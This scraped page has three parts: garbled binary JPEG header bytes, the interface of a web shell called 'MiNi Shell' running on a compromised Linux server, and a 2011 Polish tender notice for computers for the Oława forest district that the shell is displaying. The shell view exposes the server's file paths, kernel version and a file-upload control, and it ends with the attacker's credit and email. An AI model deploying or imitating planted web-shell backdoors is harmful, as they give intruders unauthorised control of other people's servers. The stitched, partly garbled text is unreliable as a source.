JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/114762-N-2011.html

<p class="kh_header"><b>Oława: Dostawa komputerów do Nadleśnictwa Oława</b><br>
<b>Numer ogłoszenia: 114762 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Oława , Bystrzyca, ul. Lipowa 8, 55-200 Oława, woj. dolnośląskie, tel. 071 3036724, 3036725, faks 071 3036724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.lasy.gov.pl/olawa</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Organizacyjna Nieposiadająca Osobowości Prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa komputerów do Nadleśnictwa Oława.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 PROCESOR	Min. i5-450M (2,4 GHz, 3 MB pamięci podręcznej L3) lub równoważny wersja BOX, 4 rdzenie.
2 DYSK TWARDY	Minimum SATA II 320 GB, 7200 obr.min
3 PAMIĘĆ OPERACYJNA	2 GB pamięci DDR3 SDRAM 1333 MHz, możliwość rozbudowy do 8 GB
4 KARTA GRAFICZNA	Karta graficzna ATI Mobility Radeon HD 540v z 512 MB wydzielonej pamięci wideo
5 NAPĘD OPTYCZNY	DVD+-RW SuperMulti DL LightScribe
6 WYŚWIETLACZ	Wyświetlacz LED HD+ o przekątnej 39,6 cm (15,6cala) (rozdzielczość 1600 x 900), z powłoką antyrefleksyjną, matowy
 7KARTA SIECIOWA	10-100-1000 Mbps, zintegrowana z płytą główną, Karta sieciowa 802.11b-g-n; z technologią bezprzewodową Bluetooth 2.1+EDR
8 MYSZ, KLAWIATURA	Pełnowymiarowa, odporna na zalanie klawiatura z kanalikami odpływowymi i osobna klawiatura numeryczna, Tabliczka dotykowa z obszarem przewijania i dwoma przyciskami wyboru
9 GWARANCJA	Minimum  24 miesiące 
10 SYSTEM OPERACYJNY	Microsoft Windows professional 7 OEM (32-bit) 
11 MULTIMEDIA	Karta dźwiękowa HP Premier Sound; Wbudowane głośniki stereo; Wbudowany mikrofon, kamera internetowa o rozdzielczości 2 megapiksele); Dotykowe elementy sterujące
12 ZŁĄCZA	3 porty USB 2.0; 1 port eSATA-USB 2.0 (combo); 1 gniazdo zew. monitora VGA; 1 złącze DisplayPort; 1 port 1394a; 1 port szeregowy; 1 wejście mikrofonu stereo; 1 wyjście słuchawek stereo-wyjście sygnałowe audio; 1 gniazdo zasilania; 1 złącze RJ-11 (wybrane modele); 1 port RJ-45; 1 złącze dokowania; 1 złącze akumulatora dodatkowego, 1 gniazdo kart Express Card-54; 1 czytnik kart pamięci, czytnik linii papilarnych.
13 BATERIA 	6-ogniwowy akumulator litowy (55 Wh), laptop zaopatrzony w oryginalny zasilacz
14 STACJA DOKUJĄCA	
Pełna replikacja portów, łącząca się złączem dokującym z laptopem (nie złączem USB),  4 porty USB, D-Sub, DVI, własny zasilacz (dodatkowy)

Dodatkowe akcesoria

1  MONITOR  - 7 szt.	

Przekątna 21,5 cala, technologia podświetlania LED, czas reakcji 5 ms, jasność 250
cd-m2, kąt widzenia - pion 160 stopni, kąt widzenia - poziom 170 stopni, kontrast 5000000:1dc, rozdzielczość 1920x1080, Częstotliwość pozioma 24-83 kHz, Częstotliwość pionowa 50-76 Hz, rozmiar plamki 0,248mm, złącza D-Sub, DVI-D , kabel DVI i D-Sub, HDMI - DVI. o długości min 2 metry, pobór mocy w trybie pracy normalnej 28 Watt
2 ZESTAW MYSZ + KLAWIATURA - 2 szt.	
Zestaw radiowy na paśmie 2,4 GHz, rozdzielczość myszy 1000 dpi, interfejs USB
3 UPS - 3 szt.
moc wyjściowa 400W - 650 VA, maksymalna moc, jaką można konfigurować 400W- 650 VA, gniazda wyjściowe: IEC 320 C13, IEC 320 C13, IEC Jumpers, częstotliwość na wejściu 50-60 Hz + - 3% ( autodetekcja ), typ gniazda wejściowego IEC-320 C14, długość przewodu zasilania 2 metry, zakres napięcia wejściowego w trybie podstawowym 180 - 260V, zmienny zakres napięcia wejściowego w trybie podstawowym 160 - 282V, typ akumulatora bezobsługowe baterie ołowiowo-kwasowe, typowy czas pełnego ładowania akumulatora 8 godziny, panel przedni Diody LED wskazują pracę z sieci : pracę z baterii : stan wymiany baterii : wskaźniki stanu przeciążenia, alarm dźwiękowy alarm podczas pracy na baterii: znaczny stan wyczerpania baterii : ciągły sygnał dźwiękowy w stanie przeciążenia, powiadamianie o zmieniających się warunkach zasilania z sieci miejskiej i z UPS-a, znamionowa energia przepięcia (w dżulach) 320 Dżule, ochrona linii danych: analogowa linia telefoniczna dla telefonu-faksu-modemu-DSL (złącze RJ-45), środowisko operacyjne 0 - 40 °C, wilgotność względna podczas pracy 5 - 95%, wysokość n.p.m. podczas pracy 0-9000 metry, temperatura (przechowywanie) -15 - 45 °C, poziom hałasu w odległości 1 m od powierzchni urządzenia 45.00 dBA, potwierdzenia zgodności: Znak A, Znak C, CE, GOST, NEMKO, okres gwarancji 2 lata naprawy albo wymiana, zgodność środowiskowa RoHS, ciężar netto 6.03 KG, złącze USB: umożliwia zarządzanie UPS-em przez port USB, port szeregowy: zarządzanie zasilaczem UPS przez port szeregowy, bezpiecznik automatyczny, automatyczne włączenie UPS-a po powrocie zasilania, akumulatory wymienialne przez użytkownika na gorąco bez przerywania pracy systemu, możliwość zimnego startu, bez narzędziowa wymiana akumulatora, automatyczny test okresowy - auto test akumulatora zapewnia wczesne wykrywanie konieczności wymiany.Parametry środowiskowe 
środowisko operacyjne 0 - 40 °C, 
Wilgotność względna podczas pracy 0 - 95%, 
Wysokość n.p.m. podczas pracy 0-3000 metry 
Wilgotność względna (przechowywanie) 0 - 95%, 
Poziom hałasu w odległości 1 m od powierzchni urządzenia 
45.00 dBA 
Potwierdzenia zgodności 
BSI 1363,Znak C,CE,GOST,NEMKO,TUV 
Współpraca z komputerem poprzez złącze USB. Dodatkowo oprogramowanie do współpracy z komputerem
Okres gwarancji 2 lata naprawy albo wymiana 
4 KABEL SIECIOWY - 4 szt.
Kabel sieciowy typu linka zaprawiony o długości 7 m
5 PENDRIVE - 3 szt.	Pendrive 16 GB, Gumowa obudowa: wodo-pyło-szczelna;
Odczyt 31MB/s, Zapis 15MB-s, smycz.
6 STACJA DOKUJĄCA NA USB DO LAPTOPA HP - 1 szt.
4 porty USB 2.0; 1 gniazdo zewn. monitora DVI; 1 złącze RJ-45

7 TORBA NA LAPTOPA - 3 szt.
Torba z paskiem na ramię na komputer o wielkości matrycy 15,6cala, dwoma lub więcej komorami, zamykana, dodatkowa kieszeń zewnętrzna zamykana, kolor czarny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.72.70-2, 33.19.51.00-4, 30.23.72.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WADIUM 
Zamawiający wymaga wniesienia wadium w kwocie: 250,00 zł.
Wadium może być wnoszone wedle wyboru wykonawcy w jednej lub kilku następujących formach:
1)pieniądzu
2)poręczeniach bankowych i poręczenia spółdzielczych kas oszczędnościowo - kredytowych, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych
4)warancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: BZ WBK S.A. I-0 w Oławie nr 51109024280000000614036971

z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy wpłata.

Przykład :
Przetarg nieograniczony - Dostawa komputerów do Nadleśnictwa Oława 
Wadium w formie wpłaty gotówkowej do kasy Nadleśnictwa nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego.
Wadium należy wnieść w terminie do dnia 26.05.2011 r. do godz. 9.00. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku zamawiającego. 
Zamawiający zwróci niezwłocznie wadium wykonawcy, jeżeli:
1)upłynął termin związania ofertą;
2)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3)zamawiający unieważnił postępowanie o udzielenie zamówienia.
Z zastrzeżeniem pkt 9.7 specyfikacji istotnych warunków zamówienia, Zamawiający zwraca wadium na wniosek wykonawcy:
1)który wycofał ofertę przed upływem terminu składania ofert;
2)który został wykluczony z postępowania;
3)którego oferta została odrzucona.
Zamawiający zatrzyma wadium, jeżeli wykonawca, którego oferta została wybrana:
1)odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy. 
Zamawiający zatrzymuje wadium, jeżeli w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności.
Zmiany umowy będą mogły być wprowadzane w związku z zaistnieniem niżej wyszczególnionych okoliczności:
1)zmian stanu prawnego 
5)konieczności wprowadzenia zmian redakcyjnych, będących następstwem zmian danych Zamawiającego lub Wykonawcy, ujawnionych w rejestrach publicznych
Wskazane okoliczności nie mogą być zawinione przez Zamawiającego ani Wykonawcę, i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy.
Wszelkie zmiany wprowadzone do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności z przepisów ustawy PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.lasy.gov.pl/olawa<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Oława
ul. Lipowa 8 Bystrzyca
55-200 Oława 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 09:00, miejsce: Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Oława
ul. Lipowa 8 Bystrzyca
55-200 Oława 1
pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com